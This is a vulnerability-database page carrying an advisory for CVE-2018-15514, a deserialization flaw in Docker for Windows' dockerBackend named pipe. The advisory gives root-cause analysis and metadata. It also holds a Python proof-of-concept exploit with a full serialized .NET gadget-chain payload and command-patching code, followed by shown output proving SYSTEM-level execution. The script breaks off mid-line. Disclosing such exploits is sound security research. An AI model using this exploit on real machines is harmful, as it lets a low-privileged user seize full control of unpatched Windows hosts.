Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
srcinciteSteven Seeley (mr_me) of Source InciteSRC-2018-0026
HistoryApr 03, 2018 - 12:00 a.m.

SRC-2018-0026 : Docker dockerBackend HandleRequestAsync Deserialization of Untrusted Data Elevation of Privilege Vulnerability

2018-04-0300:00:00
Steven Seeley (mr_me) of Source Incite
srcincite.io
8

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

0.016 Low

EPSS

Percentile

87.6%

JSON

Vulnerability Details:

This vulnerability allows local attackers to escalate privileges on vulnerable installations of Docker for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within processing of requests set to the NamedPipe dockerBackend. When parsing the request buffer, the process does not properly validate user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.

Affected Vendors:

Docker

Affected Products:

Docker for Windows

Vendor Response:

Docker has issued an update to correct these vulnerabilities. More details can be found at:
<https://docs.docker.com/docker-for-windows/edge-release-notes/#docker-community-edition-18060-ce-win69-2018-07-25&gt;

"""
Docker dockerBackend HandleRequestAsync Deserialization of Untrusted Data Elevation of Privilege Vulnerability
CVE: CVE-2018-15514
File: Docker for Windows Installer.exe
sha256sum: 133375d3cc27a6a2315b9c3a28107a21ec9a22aaf7a1e0c3be74b078706c63f3
Download: https://download.docker.com/win/stable/Docker%20for%20Windows%20Installer.exe

Summary:
========

The "Docker for Windows Service" creates a NamedPipe called dockerBackend for IPC between the client and the server. A local, unprivileged attacker can
use this to elevate privileges in the context of SYSTEM.

Tested on:
==========

- Windows 10 x64 r2 Version 10.0.16299.309 (latest at the time)
- Docker for Windows v17.12.0-ce-win46 (latest at the time)

Notes:
======

- This exploit used the ysoserial.net tool. I have provided a compiled version for you.
- The command I used for ysoserial.net is: ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o raw -c "[CMD]" > poc.bin
  I also patched poc.bin so that we can just generate any commands and exec anything as SYSTEM without having to generate the payload again.
- The SID for the docker-users group is: S-1-5-21-965929679-2026844499-2041157940-1005

Vulnerability Analysis:
=======================

Looking at Docker.core.dll we can see that the vulnerability occurs in the NamedPipeServer class within the HandleRequestAsync function where it reads attacker controlled data into the requestBytes byte array. Then, using the data, it is parsed directly to BinaryFormatter.Deserialize().

namespace Docker.Core.Pipe
{
	// Token: 0x02000042 RID: 66
	public class NamedPipeServer
	{

	...

		private async Task HandleRequestAsync(NamedPipeServerStream pipeServer)
		{
			try
			{
				using (NamedPipeServerStream server = pipeServer)
				{
					byte[] sizeBytes = new byte[4];
					await server.ReadAsync(sizeBytes, 0, sizeBytes.Length);
					int size = BitConverter.ToInt32(sizeBytes, 0);
					byte[] requestBytes = new byte[size];
					await server.ReadAsync(requestBytes, 0, requestBytes.Length);
					BinaryFormatter bf = new BinaryFormatter();
					PipeRequest request = (PipeRequest)bf.Deserialize(new MemoryStream(requestBytes, 0,

Upon seeing this, it was clear we could use the BinaryFormatter class for exploitation.

Triggering:
===========

As it turns out, the low privileged user needs to be a member of the docker-users group that is created when installing Docker for Windows. Please see perms.png for details. This is a common configuration, to just add your user to this group. See https://github.com/docker/for-win/issues/868#issuecomment-312639000

Here, I add my test user to the docker-users group and spawn a low privileged cmd prompt.

c:\>net localgroup docker-users test /add
The command completed successfully.

c:\>runas /user:test cmd
Enter the password for test:
Attempting to start cmd as user "target\test" ...

Now run the poc in the new window.

Example:
========

c:\>cd c:\Users\test\docker-eop

c:\Users\test\docker-eop>type c:\si.txt
The system cannot find the file specified.

c:\Users\test\docker-eop>poc.py
(+) usage C:\Users\test\docker-eop\poc.py(+) eg: C:\Users\test\docker-eop\poc.py "whoami > c:\si.txt"

c:\Users\test\docker-eop>poc.py "whoami > c:\si.txt"

c:\Users\test\docker-eop>type c:\si.txt
nt authority\system

c:\Users\test\docker-eop>
"""
import sys
import struct

if len(sys.argv) != 2:
    print "(+) usage %s" % sys.argv[0]
    print "(+) eg: %s \"whoami > c:\\si.txt\"" % sys.argv[0]
    sys.exit(-1)
    
cmd = "/c %s" % sys.argv[1]

payload  = "\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x0c\x02\x00"
payload += "\x00\x00\x49\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34"
payload += "\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74"
payload += "\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d"
payload += "\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x05\x01\x00\x00"
payload += "\x00\x84\x01\x53\x79\x73\x74\x65\x6d\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"
payload += "\x73\x2e\x47\x65\x6e\x65\x72\x69\x63\x2e\x53\x6f\x72\x74\x65\x64\x53\x65\x74\x60"
payload += "\x31\x5b\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73"
payload += "\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e"
payload += "\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c"
payload += "\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37"
payload += "\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d\x5d\x04\x00\x00\x00\x05"
payload += "\x43\x6f\x75\x6e\x74\x08\x43\x6f\x6d\x70\x61\x72\x65\x72\x07\x56\x65\x72\x73\x69"
payload += "\x6f\x6e\x05\x49\x74\x65\x6d\x73\x00\x03\x00\x06\x08\x8d\x01\x53\x79\x73\x74\x65"
payload += "\x6d\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x47\x65\x6e\x65\x72\x69"
payload += "\x63\x2e\x43\x6f\x6d\x70\x61\x72\x69\x73\x6f\x6e\x43\x6f\x6d\x70\x61\x72\x65\x72"
payload += "\x60\x31\x5b\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d"
payload += "\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30"
payload += "\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61"
payload += "\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37"
payload += "\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d\x5d\x08\x02\x00\x00"
payload += "\x00\x02\x00\x00\x00\x09\x03\x00\x00\x00\x02\x00\x00\x00\x09\x04\x00\x00\x00\x04"
payload += "\x03\x00\x00\x00\x8d\x01\x53\x79\x73\x74\x65\x6d\x2e\x43\x6f\x6c\x6c\x65\x63\x74"
payload += "\x69\x6f\x6e\x73\x2e\x47\x65\x6e\x65\x72\x69\x63\x2e\x43\x6f\x6d\x70\x61\x72\x69"
payload += "\x73\x6f\x6e\x43\x6f\x6d\x70\x61\x72\x65\x72\x60\x31\x5b\x5b\x53\x79\x73\x74\x65"
payload += "\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20"
payload += "\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c"
payload += "\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63"
payload += "\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33"
payload += "\x34\x65\x30\x38\x39\x5d\x5d\x01\x00\x00\x00\x0b\x5f\x63\x6f\x6d\x70\x61\x72\x69"
payload += "\x73\x6f\x6e\x03\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65"
payload += "\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x09"
payload += "\x05\x00\x00\x00\x11\x04\x00\x00\x00\x02\x00\x00\x00\x06\x06\x06\x07\x00\x00\x00"
payload += "\x03\x63\x6d\x64\x04\x05\x00\x00\x00\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c"
payload += "\x65\x67\x61\x74\x65\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f"
payload += "\x6c\x64\x65\x72\x03\x00\x00\x00\x08\x44\x65\x6c\x65\x67\x61\x74\x65\x07\x6d\x65"
payload += "\x74\x68\x6f\x64\x30\x07\x6d\x65\x74\x68\x6f\x64\x31\x03\x03\x03\x30\x53\x79\x73"
payload += "\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72\x69\x61\x6c\x69\x7a"
payload += "\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2b\x44\x65\x6c\x65\x67\x61\x74\x65"
payload += "\x45\x6e\x74\x72\x79\x2f\x53\x79\x73\x74\x65\x6d\x2e\x52\x65\x66\x6c\x65\x63\x74"
payload += "\x69\x6f\x6e\x2e\x4d\x65\x6d\x62\x65\x72\x49\x6e\x66\x6f\x53\x65\x72\x69\x61\x6c"
payload += "\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2f\x53\x79\x73\x74\x65\x6d"
payload += "\x2e\x52\x65\x66\x6c\x65\x63\x74\x69\x6f\x6e\x2e\x4d\x65\x6d\x62\x65\x72\x49\x6e"
payload += "\x66\x6f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65"
payload += "\x72\x09\x08\x00\x00\x00\x09\x09\x00\x00\x00\x09\x0a\x00\x00\x00\x04\x08\x00\x00"
payload += "\x00\x30\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72"
payload += "\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2b\x44\x65\x6c"
payload += "\x65\x67\x61\x74\x65\x45\x6e\x74\x72\x79\x07\x00\x00\x00\x04\x74\x79\x70\x65\x08"
payload += "\x61\x73\x73\x65\x6d\x62\x6c\x79\x06\x74\x61\x72\x67\x65\x74\x12\x74\x61\x72\x67"
payload += "\x65\x74\x54\x79\x70\x65\x41\x73\x73\x65\x6d\x62\x6c\x79\x0e\x74\x61\x72\x67\x65"
payload += "\x74\x54\x79\x70\x65\x4e\x61\x6d\x65\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65"
payload += "\x0d\x64\x65\x6c\x65\x67\x61\x74\x65\x45\x6e\x74\x72\x79\x01\x01\x02\x01\x01\x01"
payload += "\x03\x30\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72"
payload += "\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2b\x44\x65\x6c"
payload += "\x65\x67\x61\x74\x65\x45\x6e\x74\x72\x79\x06\x0b\x00\x00\x00\xb0\x02\x53\x79\x73"
payload += "\x74\x65\x6d\x2e\x46\x75\x6e\x63\x60\x33\x5b\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53"
payload += "\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72"
payload += "\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72"
payload += "\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79"
payload += "\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30"
payload += "\x38\x39\x5d\x2c\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20"
payload += "\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e"
payload += "\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72"
payload += "\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62"
payload += "\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d\x2c\x5b\x53\x79"
payload += "\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f"
payload += "\x63\x65\x73\x73\x2c\x20\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72\x73\x69\x6f"
payload += "\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e"
payload += "\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b"
payload += "\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d"
payload += "\x5d\x06\x0c\x00\x00\x00\x4b\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72"
payload += "\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72"
payload += "\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79"
payload += "\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30"
payload += "\x38\x39\x0a\x06\x0d\x00\x00\x00\x49\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72"
payload += "\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72"
payload += "\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79"
payload += "\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30"
payload += "\x38\x39\x06\x0e\x00\x00\x00\x1a\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e"
payload += "\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x06\x0f\x00\x00\x00\x05"
payload += "\x53\x74\x61\x72\x74\x09\x10\x00\x00\x00\x04\x09\x00\x00\x00\x2f\x53\x79\x73\x74"
payload += "\x65\x6d\x2e\x52\x65\x66\x6c\x65\x63\x74\x69\x6f\x6e\x2e\x4d\x65\x6d\x62\x65\x72"
payload += "\x49\x6e\x66\x6f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c"
payload += "\x64\x65\x72\x07\x00\x00\x00\x04\x4e\x61\x6d\x65\x0c\x41\x73\x73\x65\x6d\x62\x6c"
payload += "\x79\x4e\x61\x6d\x65\x09\x43\x6c\x61\x73\x73\x4e\x61\x6d\x65\x09\x53\x69\x67\x6e"
payload += "\x61\x74\x75\x72\x65\x0a\x53\x69\x67\x6e\x61\x74\x75\x72\x65\x32\x0a\x4d\x65\x6d"
payload += "\x62\x65\x72\x54\x79\x70\x65\x10\x47\x65\x6e\x65\x72\x69\x63\x41\x72\x67\x75\x6d"
payload += "\x65\x6e\x74\x73\x01\x01\x01\x01\x01\x00\x03\x08\x0d\x53\x79\x73\x74\x65\x6d\x2e"
payload += "\x54\x79\x70\x65\x5b\x5d\x09\x0f\x00\x00\x00\x09\x0d\x00\x00\x00\x09\x0e\x00\x00"
payload += "\x00\x06\x14\x00\x00\x00\x3e\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f"
payload += "\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x20\x53\x74\x61\x72\x74\x28"
payload += "\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x53\x79\x73\x74\x65"
payload += "\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x06\x15\x00\x00\x00\x3e\x53\x79\x73\x74\x65"
payload += "\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73"
payload += "\x73\x20\x53\x74\x61\x72\x74\x28\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e"
payload += "\x67\x2c\x20\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x08\x00\x00"
payload += "\x00\x0a\x01\x0a\x00\x00\x00\x09\x00\x00\x00\x06\x16\x00\x00\x00\x07\x43\x6f\x6d"
payload += "\x70\x61\x72\x65\x09\x0c\x00\x00\x00\x06\x18\x00\x00\x00\x0d\x53\x79\x73\x74\x65"
payload += "\x6d\x2e\x53\x74\x72\x69\x6e\x67\x06\x19\x00\x00\x00\x2b\x49\x6e\x74\x33\x32\x20"
payload += "\x43\x6f\x6d\x70\x61\x72\x65\x28\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e"
payload += "\x67\x2c\x20\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x06\x1a\x00"
payload += "\x00\x00\x32\x53\x79\x73\x74\x65\x6d\x2e\x49\x6e\x74\x33\x32\x20\x43\x6f\x6d\x70"
payload += "\x61\x72\x65\x28\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x53"
payload += "\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x08\x00\x00\x00\x0a\x01\x10"
payload += "\x00\x00\x00\x08\x00\x00\x00\x06\x1b\x00\x00\x00\x71\x53\x79\x73\x74\x65\x6d\x2e"
payload += "\x43\x6f\x6d\x70\x61\x72\x69\x73\x6f\x6e\x60\x31\x5b\x5b\x53\x79\x73\x74\x65\x6d"
payload += "\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56"
payload += "\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74"
payload += "\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b"
payload += "\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34"
payload += "\x65\x30\x38\x39\x5d\x5d\x09\x0c\x00\x00\x00\x0a\x09\x0c\x00\x00\x00\x09\x18\x00"
payload += "\x00\x00\x09\x16\x00\x00\x00\x0a\x0b"

# now we patch our payload
data = bytearray(payload)

# patch the size
data[655:655] = struct.pack(">I", len(cmd))

# patch the cmd
data[659:659] = cmd

# get the size to send
size = struct.pack("

Related

nvd 1
prion 1
openvas 1
cve 1
nessus 1
osv 1
cvelist 1
nvd
nvd
CVE-2018-15514
2018-09-01 01:29:00
prion
prion
Design/Logic Flaw
2018-09-01 01:29:00
openvas
openvas
Docker for Windows Privilege Escalation Vulnerability
2018-09-06 00:00:00
cve
cve
CVE-2018-15514
2018-09-01 01:29:00
nessus
nessus
Docker for Windows stable < 18.06.0-ce-win70 / edge < 18.06.0-ce-rc3-win68 Remote Privilege Escalation Vulnerability
2018-09-07 00:00:00
osv
osv
CVE-2018-15514
2018-09-01 01:29:00
cvelist
cvelist
CVE-2018-15514
2018-09-01 01:00:00

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

0.016 Low

EPSS

Percentile

87.6%

JSON
Related for SRC-2018-0026
nvd1prion1openvas1cve1nessus1osv1cvelist1